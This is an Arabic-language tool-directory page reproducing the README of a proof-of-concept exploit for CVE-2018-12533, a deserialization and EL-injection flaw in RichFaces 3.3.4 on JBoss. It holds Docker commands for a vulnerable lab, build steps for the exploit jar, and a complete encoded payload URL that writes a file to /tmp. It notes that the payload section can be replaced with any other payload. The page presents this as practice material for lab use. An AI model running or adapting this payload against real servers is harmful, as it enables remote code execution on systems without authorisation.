Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/llamaonsecurity/cve-2018-12533
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثتطوير الحمولاتمختبرات وتدريب عملي
GitHubllamaonsecurity/cve-2018-12533

CVE-2018-12533

RF-14310 / CVE-2018-12533 - مولّد الحمولة

عرض المستودع
911منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مولد حمولة RF-14310 / CVE-2018-12533

بناءً على بحث Lucifaer

كل الفضل يعود إلى https://github.com/Lucifaer

المراجع

https://access.redhat.com/security/cve/cve-2018-12533

richfaces-jboss-poc

إثبات مفهوم سهل النشر لممارسة استغلال إلغاء التسلسل + حقن EL في Richfaces 3.3.4، دون الحاجة للقلق كثيرًا حول إصدارات Java القديمة إلخ.

نشر Docker لـ jboss

لتوفير بعض المتاعب في إعداد تطبيق ضعيف، أنشأت Dockerfile بناءً على التعليمات في مقالة seclist التي تشرح CVE-2018-14667. فقط نفّذ الأوامر التالية في الدليل الجذر للمستودع:

root@kitploit:~
docker build -t richfaces-jboss .
docker run -p 8081:8080 richfaces-jboss

إذا عمل كل شيء بشكل صحيح، يمكنك الوصول إلى تطبيق اختبار photoalbum الخاص بـ richfaces على http://127.0.0.1:8081/photoalbum

ترجمة الـ poc من دليل المستودع الجذر إلى jar ضخم (سهل مع docker و pom عامل)

root@kitploit:~
cd CVE-2018-12533
docker run -v ~/.m2:/root/.m2 -v $(pwd):/usr/src/app maven:3.5-jdk-8 mvn -f /usr/src/app/pom.xml clean package install

توليد رابط POC

root@kitploit:~
java -jar target/cve_2018_12533.jar

التصفح إلى الرابط على خادم jboss

غيّر قسم /DATA/XXXXX إلى حمولتك إذا كنت تريد فعل شيء آخر غير إنشاء ملف في /tmp. هذه الحمولة تنشئ /tmp/hacked.txt http://127.0.0.1:8081/photoalbum/a4j/s/3_3_3.Finalorg.richfaces.renderkit.html.Paint2DResource/DATA/eAHNUk1r1UAUnfegVq2L-oEiItQo-goyKSJu6gOxFX2QWukTwbp4zEtuk2knM-nkpo0W3Qmi4satIOJKUBD9Be6k4KY!QQRxIYggLvVOUlssuDebXGbOnHPuufflVzaQW3bG2JhbGSZzIoScW9AR2AWJPMFU8StCajw1OQO5KWwIxzqpiGFSoGi!X!s4!OvF6yYb7LDtvX48YZSxHTbYmzM2FeiqBGScULWttywjTGbZjlCECYi-goAN9CKiQbYnmBdLwldCx!50fx5CHA!oReaEF9kd1igzVn9N-pWMNU6yjHwfd89KXrsOTZoZDRp5lzjhklHURFcsgb2--rb9-MmHqSZrBqSvRJ5fFin8rdtFK3VMujtzehNVHMj2186k8btgpVDylnM-XmZO!gRJ8rzQlQEFmHNQPIBYhDenABMTnZc6ItJ1740mawSskSI7VLGWPii!Bl4oMwt5Lo0m6n8xXxXxVvQf5l2UimUH6zjIxFbcG3!1waefpx9RfITbu4Hb1H1-9373--zaWYdwDo64lZjvm7xqaitfJ81U!9uBH0Pvdk85bTekoeWH7N7RFQuLBeTIY8AJl3RrdKMMjKCR0IGior70nBXuBs9nCo0yBa!C14Itj1g2z6VeMgvQ0oVSoxxKCFsemiJMRnxMMz8R4QJEHEv0Rm8zVlCfN6qca!r1-b5au!b5y-GVi1WfFF8T2b7KgzR8usCsQAKCoCENb1qrdzLLyuVn7OnIubGTYyNtLyQYwoTRSDvX!l8a98rfWVxP3w__.jsf

الدخول إلى شل في طرفية منفصلة لتحليل نجاح الحمولة

root@kitploit:~
docker ps
docker exec -it <containerid> bash
ls /tmp

عند استخدام الأداة exploitation بشكلها الافتراضي، ستقوم بإنشاء /tmp/cve_2018_12533، وبهذه الطريقة يمكنك التأكد من نجاح الاستغلال.

تنزيل الأداة